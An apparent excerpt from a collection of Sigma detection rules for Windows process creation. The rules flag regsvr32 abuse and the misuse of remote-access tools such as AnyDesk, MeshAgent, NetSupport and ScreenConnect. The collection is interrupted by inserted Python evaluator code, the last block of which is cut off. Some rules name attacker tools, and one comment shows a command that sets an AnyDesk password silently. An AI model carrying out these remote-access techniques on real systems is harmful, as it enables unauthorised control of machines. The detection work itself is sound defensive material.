    "content": "title: Scripting/CommandLine Process Spawned Regsvr32\nid: ab37a6ec-6068-432b-a64e-2c7bf95b1d22\nrelated:\n    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d\n      type: obsolete\nstatus: test\ndescription: Detects various command line and scripting engines/processes such as \"PowerShell\", \"Wscript\", \"Cmd\", etc. spawning a \"regsvr32\" instance.\nreferences:\n    - https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html\n    - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        Image|endswith: '\\regsvr32.exe'\n    filter_main_rpcproxy:\n        ParentImage: C:\\Windows\\System32\\cmd.exe\n        CommandLine|endswith: ' /s C:\\Windows\\System32\\RpcProxy\\RpcProxy.dll'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate \".bat\", \".hta\", \".ps1\" or \".vbs\" scripts often spawn \"regsvr32\" legitimately. Apply additional filters and exclusions as necessary\n    - Some legitimate Windows services\nlevel: medium # Can be reduced to low if you experience a ton of FP\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml",
    "content": "title: Regsvr32 DLL Execution With Uncommon Extension\nid: 50919691-7302-437f-8e10-1fe088afa145\nstatus: test\ndescription: Detects a \"regsvr32\" execution where the DLL doesn't contain a common file extension.\nreferences:\n    - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-07-17\nmodified: 2023-05-24\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: 'REGSVR32.EXE'\n    filter_main_legit_ext:\n        CommandLine|contains:\n            # Note: For better accuracy you might not want to use contains\n            - '.ax'\n            - '.cpl'\n            - '.dll' # Covers \".dll.mui\"\n            - '.ocx'\n    filter_optional_pascal:\n        CommandLine|contains: '.ppl'\n    filter_optional_avg:\n        CommandLine|contains: '.bav'\n    filter_main_null_4688:\n        CommandLine: null\n    filter_main_empty_4688:\n        CommandLine: ''\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Other legitimate extensions currently not in the list either from third party or specific Windows components.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk.yml",
    "content": "title: Remote Access Tool - AnyDesk Execution\nid: b52e84a3-029e-4529-b09b-71d19dd27e94\nstatus: test\nrelated:\n    - id: 065b00ca-5d5c-4557-ac95-64a6d0b64d86\n      type: similar\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows\n    - https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/\nauthor: frack113\ndate: 2022-02-11\nmodified: 2025-02-24\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\AnyDesk.exe'\n              - '\\AnyDeskMSI.exe'\n        - Description: AnyDesk\n        - Product: AnyDesk\n        - Company: AnyDesk Software GmbH\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml",
    "content": "title: Remote Access Tool - AnyDesk Piped Password Via CLI\nid: b1377339-fda6-477a-b455-ac0923f9ec2c\nstatus: test\ndescription: Detects piping the password to an AnyDesk instance via CMD and the '--set-password' flag.\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-28\nmodified: 2023-03-05\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            # Example: C:\\WINDOWS\\system32\\cmd.exe /C cmd.exe /c echo J9kzQ2Y0qO |C:\\ProgramData\\anydesk.exe --set-password\n            - '/c '\n            - 'echo '\n            - '.exe --set-password'\n    condition: selection\nfalsepositives:\n    - Legitimate piping of the password to AnyDesk\n    - Some FPs could occur with similar tools that use the same command line flag '--set-password'\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml",
    "content": "title: Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate\nid: 41f407b5-3096-44ea-a74f-96d04fbc41be\nstatus: test\ndescription: |\n    Detects the execution of an AnyDesk binary with a version prior to 8.0.8.\n    Prior to version 8.0.8, the AnyDesk application used a signing certificate that got compromised by threat actors.\n    Use this rule to detect instances of older versions of AnyDesk using the compromised certificate.\n    This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/\n    - https://anydesk.com/en/changelog/windows\nauthor: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-08\ntags:\n    - attack.execution\n    - attack.initial-access\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\AnyDesk.exe'\n        - Description: 'AnyDesk'\n        - Product: 'AnyDesk'\n        - Company: 'AnyDesk Software GmbH'\n    selection_version:\n        FileVersion|startswith:\n            - '7.0.'\n            - '7.1.'\n            - '8.0.1'\n            - '8.0.2'\n            - '8.0.3'\n            - '8.0.4'\n            - '8.0.5'\n            - '8.0.6'\n            - '8.0.7'\n    filter_main_uninstall:\n        CommandLine|contains:\n            - ' --remove'\n            - ' --uninstall'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml",
    "content": "title: Remote Access Tool - AnyDesk Silent Installation\nid: 114e7f1c-f137-48c8-8f54-3088c24ce4b9\nstatus: test\ndescription: Detects AnyDesk Remote Desktop silent installation, which can be used by attackers to gain remote access.\nreferences:\n    - https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20\n    - https://support.anydesk.com/Automatic_Deployment\nauthor: Ján Trenčanský\ndate: 2021-08-06\nmodified: 2023-03-05\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '--install'\n            - '--start-with-win'\n            - '--silent'\n    condition: selection\nfalsepositives:\n    - Legitimate deployment of AnyDesk\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml",
    "content": "title: Remote Access Tool - Anydesk Execution From Suspicious Folder\nid: 065b00ca-5d5c-4557-ac95-64a6d0b64d86\nrelated:\n    - id: b52e84a3-029e-4529-b09b-71d19dd27e94\n      type: similar\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows\n    - https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-05-20\nmodified: 2025-02-24\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\AnyDesk.exe'\n              - '\\AnyDeskMSI.exe'\n        - Description: AnyDesk\n        - Product: AnyDesk\n        - Company: AnyDesk Software GmbH\n    filter:\n        Image|contains:\n            - '\\AppData\\'\n            - 'Program Files (x86)\\AnyDesk'\n            - 'Program Files\\AnyDesk'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate use of AnyDesk from a non-standard folder\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml",
    "content": "title: Remote Access Tool - GoToAssist Execution\nid: b6d98a4f-cef0-4abf-bbf6-24132854a83d\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows\nauthor: frack113\ndate: 2022-02-13\nmodified: 2023-03-05\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: 'GoTo Opener'\n        - Product: 'GoTo Opener'\n        - Company: 'LogMeIn, Inc.'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_logmein.yml",
    "content": "title: Remote Access Tool - LogMeIn Execution\nid: d85873ef-a0f8-4c48-a53a-6b621f11729d\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows\nauthor: frack113\ndate: 2022-02-11\nmodified: 2023-03-05\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: LMIGuardianSvc\n        - Product: LMIGuardianSvc\n        - Company: LogMeIn, Inc.\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_meshagent_arguments.yml",
    "content": "title: Remote Access Tool - Potential MeshAgent Execution - Windows\nid: 2fbbe9ff-0afc-470b-bdc0-592198339968\nrelated:\n    - id: 22c45af6-f590-4d44-bab3-b5b2d2a2b6d9\n      type: similar\nstatus: experimental\ndescription: |\n    Detects potential execution of MeshAgent which is a tool used for remote access.\n    Historical data shows that threat actors rename MeshAgent binary to evade detection.\n    Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.\nreferences:\n    - https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access\n    - https://thecyberexpress.com/ukraine-hit-by-meshagent-malware-campaign/\n    - https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/\n    - https://www.security.com/threat-intelligence/medusa-ransomware-attacks\nauthor: Norbert Jaśniewicz (AlphaSOC)\ndate: 2025-05-19\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '--meshServiceName'\n    condition: selection\nfalsepositives:\n    - Environments that legitimately use MeshAgent\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_meshagent_exec.yml",
    "content": "title: Remote Access Tool - MeshAgent Command Execution via MeshCentral\nid: 74a2b202-73e0-4693-9a3a-9d36146d0775\nstatus: test\ndescription: |\n    Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly.\n    MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.\nreferences:\n    - https://github.com/Ylianst/MeshAgent\n    - https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-dispatcher.js#L173\n    - https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-info.js#L55\nauthor: '@Kostastsale'\ndate: 2024-09-22\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\meshagent.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    condition: selection\nfalsepositives:\n    - False positives can be found in environments using MeshAgent for remote management. Analysis should prioritize the grandparent process, MeshAgent.exe, and scrutinize the resulting child processes triggered by any suspicious interactive commands directed at the target host.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport.yml",
    "content": "title: Remote Access Tool - NetSupport Execution\nid: 758ff488-18d5-4cbe-8ec4-02b6285a434f\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md\nauthor: frack113\ndate: 2022-09-25\nmodified: 2023-03-06\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: NetSupport Client Configurator\n        - Product: NetSupport Remote Control\n        - Company: NetSupport Ltd\n        - OriginalFileName: PCICFGUI.EXE\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml",
    "content": "title: Remote Access Tool - NetSupport Execution From Unusual Location\nid: 37e8d358-6408-4853-82f4-98333fca7014\nstatus: test\ndescription: Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-19\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\client32.exe'\n        - Product|contains: 'NetSupport Remote Control'\n        - OriginalFileName|contains: 'client32.exe'\n        - Hashes|contains: IMPHASH=a9d50692e95b79723f3e76fcf70d023e\n    filter:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_renamed_meshagent_execution.yml",
    "content": "title: Remote Access Tool - Renamed MeshAgent Execution - Windows\nid: b471f462-eb0d-4832-be35-28d94bdb4780\nrelated:\n    - id: bd3b5eaa-439d-4a42-8f35-a49f5c8a2582\n      type: similar\n    - id: 2fbbe9ff-0afc-470b-bdc0-592198339968\n      type: derived\nstatus: experimental\ndescription: |\n    Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.\n    RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.\n    However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.\nreferences:\n    - https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access\n    - https://thecyberexpress.com/ukraine-hit-by-meshagent-malware-campaign/\n    - https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/\n    - https://www.security.com/threat-intelligence/medusa-ransomware-attacks\nauthor: Norbert Jaśniewicz (AlphaSOC)\ndate: 2025-05-19\ntags:\n    - attack.command-and-control\n    - attack.defense-evasion\n    - attack.t1219.002\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_meshagent:\n        - CommandLine|contains: '--meshServiceName'\n        - OriginalFileName|contains: 'meshagent'\n    filter_main_legitimate:\n        Image|endswith: '\\meshagent.exe'\n    condition: selection_meshagent and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml",
    "content": "title: Remote Access Tool - RURAT Execution From Unusual Location\nid: e01fa958-6893-41d4-ae03-182477c5e77d\nstatus: test\ndescription: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-19\nmodified: 2023-03-05\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\rutserv.exe'\n              - '\\rfusclient.exe'\n        - Product: 'Remote Utilities'\n    filter:\n        Image|startswith:\n            - 'C:\\Program Files\\Remote Utilities'\n            - 'C:\\Program Files (x86)\\Remote Utilities'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
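The NetSupport rule (37e8d358) and the RURAT rule (e01fa958) above share one shape: a selection written as a YAML list (any branch matches) minus a filter that allowlists the vendor's install directory. As an added example, not code from the SigmaHQ repository, the following small evaluator implements exactly the Sigma modifiers those two rules use (exact, endswith, startswith, contains) with Sigma's default case-insensitive matching, transcribes both rules, and runs them over constructed Sysmon-style events; the file paths in the samples are hypothetical.

```python
"""
Minimal evaluator for the 'execution from unusual location' pattern.
Only the modifiers used by rules 37e8d358 and e01fa958 are implemented.
"""
from __future__ import annotations


def _match_one(value: str, modifier: str | None, pattern: str) -> bool:
    # Sigma string matching is case-insensitive by default.
    v, p = value.lower(), pattern.lower()
    if modifier is None:
        return v == p
    if modifier == "endswith":
        return v.endswith(p)
    if modifier == "startswith":
        return v.startswith(p)
    if modifier == "contains":
        return p in v
    raise ValueError(f"unsupported modifier: {modifier}")


def field_matches(event: dict, key: str, patterns) -> bool:
    """key is 'Field' or 'Field|modifier'; a list of patterns is an OR."""
    field, _, modifier = key.partition("|")
    value = event.get(field)
    if value is None:
        return False  # a missing field never matches (e.g. no PE version info)
    if isinstance(patterns, str):
        patterns = [patterns]
    return any(_match_one(value, modifier or None, p) for p in patterns)


def or_list(event: dict, items: list[dict]) -> bool:
    """Selection written as a YAML list of maps: any item matching is enough."""
    return any(all(field_matches(event, k, v) for k, v in item.items()) for item in items)


def and_map(event: dict, item: dict) -> bool:
    """Selection written as a single map: every field must match."""
    return all(field_matches(event, k, v) for k, v in item.items())


# Transcribed from the two rules above.
NETSUPPORT_SELECTION = [
    {"Image|endswith": "\\client32.exe"},
    {"Product|contains": "NetSupport Remote Control"},
    {"OriginalFileName|contains": "client32.exe"},
    {"Hashes|contains": "IMPHASH=a9d50692e95b79723f3e76fcf70d023e"},
]
NETSUPPORT_FILTER = {"Image|startswith": ["C:\\Program Files\\", "C:\\Program Files (x86)\\"]}

RURAT_SELECTION = [
    {"Image|endswith": ["\\rutserv.exe", "\\rfusclient.exe"]},
    {"Product": "Remote Utilities"},
]
RURAT_FILTER = {"Image|startswith": ["C:\\Program Files\\Remote Utilities",
                                     "C:\\Program Files (x86)\\Remote Utilities"]}


def netsupport_unusual_location(event: dict) -> bool:
    return or_list(event, NETSUPPORT_SELECTION) and not and_map(event, NETSUPPORT_FILTER)


def rurat_unusual_location(event: dict) -> bool:
    return or_list(event, RURAT_SELECTION) and not and_map(event, RURAT_FILTER)


# Constructed sample events (hypothetical paths, not from a real incident).
SAMPLE_EVENTS = [
    {"Image": "C:\\Program Files (x86)\\NetSupport\\NetSupport Manager\\client32.exe",
     "Product": "NetSupport Remote Control"},                     # vendor install: filtered
    {"Image": "C:\\Users\\Public\\Music\\client32.exe",
     "Product": "NetSupport Remote Control"},                     # dropped copy
    {"Image": "C:\\Users\\Public\\svchost.exe",
     "OriginalFileName": "client32.exe"},                         # renamed; PE metadata survives
    {"Image": "C:\\ProgramData\\Remote Utilities\\rutserv.exe",
     "Product": "Remote Utilities"},                              # outside Program Files
    {"Image": "C:\\Program Files\\Remote Utilities - Host\\rutserv.exe",
     "Product": "Remote Utilities"},                              # vendor install: filtered
]


def run_rules(events=SAMPLE_EVENTS):
    """(netsupport_hit, rurat_hit) per event."""
    return [(netsupport_unusual_location(e), rurat_unusual_location(e)) for e in events]


if __name__ == "__main__":
    for ev, hit in zip(SAMPLE_EVENTS, run_rules()):
        print(hit, ev["Image"])
```

The third sample shows why the selection carries PE fields and an import hash as well as the image name: a renamed binary defeats the `Image|endswith` branch but still matches on OriginalFileName.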
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml",
    "content": "title: Remote Access Tool - ScreenConnect Execution\nid: 57bff678-25d1-4d6c-8211-8ca106d12053\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows\nauthor: frack113\ndate: 2022-02-13\nmodified: 2023-03-05\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: 'ScreenConnect Service'\n        - Product: 'ScreenConnect'\n        - Company: 'ScreenConnect Software'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml",
    "content": "title: Remote Access Tool - ScreenConnect Installation Execution\nid: 75bfe6e6-cd8e-429e-91d3-03921e1d7962\nstatus: test\ndescription: Detects ScreenConnect program starts whose command line carries the session parameters that establish remote access to a system.\nreferences:\n    - https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-02-11\nmodified: 2024-02-26\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'e=Access&'\n            - 'y=Guest&'\n            - '&p='\n            - '&c='\n            - '&k='\n    condition: selection\nfalsepositives:\n    - Legitimate use by administrative staff\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml",
    "content": "title: Remote Access Tool - ScreenConnect Remote Command Execution\nid: b1f73849-6329-4069-bc8f-78a604bb8b23\nstatus: test\ndescription: Detects the execution of a system command via the ScreenConnect RMM service.\nreferences:\n    - https://github.com/SigmaHQ/sigma/pull/4467\nauthor: Ali Alwashali\ndate: 2023-10-10\nmodified: 2024-02-26\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\ScreenConnect.ClientService.exe'\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli:\n        # Example:\n        #   CommandLine: \"cmd.exe\" /c \"C:\\Windows\\TEMP\\ScreenConnect\\23.6.8.8644\\3c41d689-bbf5-4216-b2f4-ba8fd6192c25run.cmd\"\n        CommandLine|contains: '\\TEMP\\ScreenConnect\\'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used.\n# Note: Increase the level if you don't leverage ScreenConnect\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml",
    "content": "title: Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution\nid: 7b582f1a-b318-4c6a-bf4e-66fe49bf55a5\nrelated:\n    - id: d1a401ab-8c47-4e86-a7d8-2460b6a53e4a\n      type: derived\nstatus: test\ndescription: |\n    Detects potentially suspicious child processes launched from a run.cmd script staged by the ScreenConnect client service.\nreferences:\n    - https://www.mandiant.com/resources/telegram-malware-iranian-espionage\n    - https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\n    - https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale\ndate: 2022-02-25\nmodified: 2024-02-28\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentCommandLine|contains|all:\n            - ':\\Windows\\TEMP\\ScreenConnect\\'\n            - 'run.cmd'\n        Image|endswith:\n            - '\\bitsadmin.exe'\n            - '\\cmd.exe'\n            - '\\curl.exe'\n            - '\\dllhost.exe'\n            - '\\net.exe'\n            - '\\nltest.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\rundll32.exe'\n            - '\\wevtutil.exe'\n    condition: selection\nfalsepositives:\n    - If the script being executed makes legitimate use of any of the utilities listed in the detection, those invocations should be filtered out or allowed.\nlevel: medium\n"
  },
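The two ScreenConnect rules above (b1f73849 and 7b582f1a) describe consecutive hops of one process chain: the client service launches cmd.exe on a run.cmd staged under C:\Windows\TEMP\ScreenConnect\, and that batch file then spawns the tool the operator pushed. The following is an added example, not code from the SigmaHQ repository, that re-implements both rules and runs them over a constructed Sysmon-style event chain. The staged path reuses the version and GUID from the comment in rule b1f73849; the install directory name "ScreenConnect Client (abc123)" and the child command lines are hypothetical.

```python
"""
Re-implementation of the two ScreenConnect process-chain rules over constructed
process-creation events. Sigma string matching is case-insensitive, so every
comparison lower-cases both sides.
"""
import ntpath

# Image suffixes from rule 7b582f1a (suspicious children of the staged run.cmd).
SUSP_CHILD_IMAGES = [
    "\\bitsadmin.exe", "\\cmd.exe", "\\curl.exe", "\\dllhost.exe", "\\net.exe",
    "\\nltest.exe", "\\powershell.exe", "\\pwsh.exe", "\\rundll32.exe", "\\wevtutil.exe",
]


def _lc(event, field):
    """Lower-cased field value; a missing field becomes '' and never matches."""
    return (event.get(field) or "").lower()


def screenconnect_remote_exec(event) -> bool:
    """Rule b1f73849: cmd.exe spawned by ScreenConnect.ClientService.exe to run a staged .cmd."""
    parent_ok = _lc(event, "ParentImage").endswith("\\screenconnect.clientservice.exe")
    image_ok = (_lc(event, "Image").endswith("\\cmd.exe")
                or _lc(event, "OriginalFileName") == "cmd.exe")
    cli_ok = "\\temp\\screenconnect\\" in _lc(event, "CommandLine")
    return parent_ok and image_ok and cli_ok


def screenconnect_susp_child(event) -> bool:
    """Rule 7b582f1a: a discovery / download / LOLBIN child of the staged run.cmd."""
    pcl = _lc(event, "ParentCommandLine")
    parent_ok = ":\\windows\\temp\\screenconnect\\" in pcl and "run.cmd" in pcl
    image = _lc(event, "Image")
    return parent_ok and any(image.endswith(s) for s in SUSP_CHILD_IMAGES)


def triage_chain(events):
    """Return, per event, which of the two rules fired."""
    return [
        {"image": ntpath.basename(e["Image"]),
         "remote_exec": screenconnect_remote_exec(e),
         "susp_child": screenconnect_susp_child(e)}
        for e in events
    ]


# Staged batch file path, taken from the example comment in rule b1f73849.
STAGED_CMD = ('"cmd.exe" /c "C:\\Windows\\TEMP\\ScreenConnect\\23.6.8.8644\\'
              '3c41d689-bbf5-4216-b2f4-ba8fd6192c25run.cmd"')
# Hypothetical client install directory (constructed, not from a real host).
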